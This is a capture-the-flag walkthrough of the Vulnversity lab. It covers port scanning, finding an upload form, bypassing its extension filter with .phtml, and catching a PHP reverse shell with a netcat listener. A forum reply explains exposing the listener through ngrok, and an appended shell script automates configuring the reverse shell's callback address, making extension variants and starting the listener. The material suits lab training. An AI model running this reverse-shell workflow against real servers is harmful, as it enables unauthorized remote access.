# Connect via OpenVPN

Follow along with this writeup and deploy your own instance of Vulnversity. The goal is to gain access at the system level by exploiting web application vulnerabilities. First we need to connect via the VPN and deploy the machine: download the access file from your profile and connect to it with OpenVPN. Once connected, deploy the machine.

# Enumerating and Initial Access

The first thing we need to do is look for open ports. This can be done with a number of tools, but nothing beats an Nmap scan; I personally scan IP addresses this way. The scan shows an Apache server running on port 3333. Opening the IP on that port in the browser presents the web application.

Next we need to find directories and any functionality, such as an upload form, that would let us upload a reverse shell. There are several tools for this job (dirb, dirbuster, wfuzz, gobuster); it all depends on your preference. Opening the "/internal/" directory reveals an upload form.

The first thing to check with any upload form is the extension filter. Most of the time it is possible to bypass the check. Webshells ship with Kali Linux, and we will use the PHP reverse shell. Copy it into your working directory, then open it and edit the two details needed for the reverse connection, the IP address and the port: run "ifconfig" and take the IP address of the "tun0" interface, and pick a port. Once done, start listening for the reverse connection with netcat on that port.

Now all we need to do is upload the PHP reverse shell. At first let's try uploading the traditional ".php" file. To check which extension is not being sanitized properly, I renamed the file to "reverse.php" and made multiple copies with different extensions (manually fuzzing which extension works). Testing the other extensions shows that ".phtml" is allowed.

Next we look for where our reverse shell has been uploaded: navigating to "/uploads/" reveals it. Opening the file in the browser executes it on the machine, which makes the machine connect back to our netcat listener using the PHP shell. Now we can check who we actually are on the system and what privileges that user has.

# Replies: reverse shell not connecting back

Keep in mind this is a staged payload. This is a module from Rapid7 that should be used with their handler, but you don't have to. This will work with any operating system on a server.

So ngrok makes a localhost port public, like localhost:3000 -> a public endpoint, so at this point you have something like a public subdomain and a public IP that forwards the connections to your localhost. So when you execute the PHP script, it runs on the server that hosts the file (localhost) and tries to connect to the desired IP. If your IP is in the same network as the server (or your routing table is configured to forward to another network), the server tries to make the connection serverip -> yourcomputerip:8080. So the PHP is being executed in your server, not in another site. The file needs to be executed from the server that you want to connect to, so that the PHP on that system executes the bash command. So if that other server (remote URL) executes that PHP (you upload the file and open the URL), you would need a public IP, because that server is on the internet and cannot find your physical IP. Ask me if there is something that you don't understand. I'm writing this on my phone and it is a bit difficult to structure the text.
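The preparation steps from the writeup (edit the IP and port in the PHP reverse shell that ships with Kali, make copies with alternative extensions for fuzzing the upload filter, and start the netcat listener), as an added shell script; this is my code, not the writeup author's. It assumes the pentestmonkey php-reverse-shell.php layout found at /usr/share/webshells/php/ on Kali (a `$ip = '...';` line and a `$port = ...;` line), a VPN interface named tun0, and uses `ip addr` instead of the deprecated ifconfig. The listener port 4444 and the extension list are my choices, not values from the page.

```shell
#!/usr/bin/env bash
# Added example, not part of the original writeup.
# Prepares the Kali PHP reverse shell, creates copies with alternative
# extensions to fuzz the upload filter by hand, and starts the listener.
set -eu

# IP address of the VPN interface (assumed to be tun0, as in the writeup).
# Exits non-zero when the interface is absent, i.e. the VPN is not up.
tun0_ip() {
  ip -4 -o addr show dev tun0 | awk '{print $4}' | cut -d/ -f1
}

# Rewrite the $ip and $port lines of php-reverse-shell.php.
# Matches the pentestmonkey layout:
#   $ip = '127.0.0.1';  // CHANGE THIS
#   $port = 1234;       // CHANGE THIS
# The '.' in the pattern stands for the literal '$' so no escaping is needed.
configure_shell() {
  src="$1"; dst="$2"; lhost="$3"; lport="$4"
  sed -e "s/^\(.ip = \)'[^']*';/\1'${lhost}';/" \
      -e "s/^\(.port = \)[0-9]*;/\1${lport};/" "$src" > "$dst"
  # Sanity check: both values must now be present, otherwise the shell
  # would silently try to call back to 127.0.0.1:1234.
  grep -qF "\$ip = '${lhost}';" "$dst" && grep -qF "\$port = ${lport};" "$dst"
}

# Copy the configured shell once per candidate extension and print the
# resulting paths, so each one can be tried against the upload form.
make_variants() {
  base="$1"; shift
  stem="${base%.*}"
  for ext in "$@"; do
    cp "$base" "${stem}.${ext}"
    echo "${stem}.${ext}"
  done
}

# Listen for the callback (-l listen, -v verbose, -n no DNS, -p port).
start_listener() {
  nc -lvnp "$1"
}

# Typical run on Kali (hypothetical port and extension list):
#   configure_shell /usr/share/webshells/php/php-reverse-shell.php \
#                   reverse.php "$(tun0_ip)" 4444
#   make_variants reverse.php phtml php3 php4 php5 phar
#   start_listener 4444
```

If the target cannot reach the VPN address (the situation described in the replies), the same `configure_shell` call works with the public host and port that ngrok hands out instead of the tun0 address and local port.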